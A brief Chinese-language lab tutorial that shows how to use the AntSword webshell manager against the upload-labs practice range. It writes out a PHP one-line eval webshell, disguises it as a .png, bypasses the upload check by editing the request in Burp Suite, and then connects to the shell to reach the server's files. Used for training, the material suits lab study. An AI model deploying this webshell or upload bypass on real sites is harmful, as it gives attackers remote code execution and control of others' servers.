蚁剑使用实例

前提：1、upload-labs靶场已经搭建并正常使用 2、蚁剑已经安装并可以正常使用

1、新建一个test.txt文件，在文件中写一句话木马<?php @eval($_POST["x"]);?> 并保存

2、将test.txt更名为test.png

3、打开burpsuite工具，打开代理功能，访问upload-labs靶场，进入第一关

4、上传本地的test.png文件后，修改已上传的文件格式，如下，放行请求

 

 5、返回靶场，查看已上传的文件，选中文件后右击选择复制图片链接

 6、打开蚁剑，空白处右击选择添加数据

 7、填写已经复制的图片的url地址，和test文件中一句话木马里的参数

 8、测试连接，测试成功后点击左上角的添加按钮

 9、双击地址，可以查看已上传文件所在服务器的路径，可对服务器上的文件做操作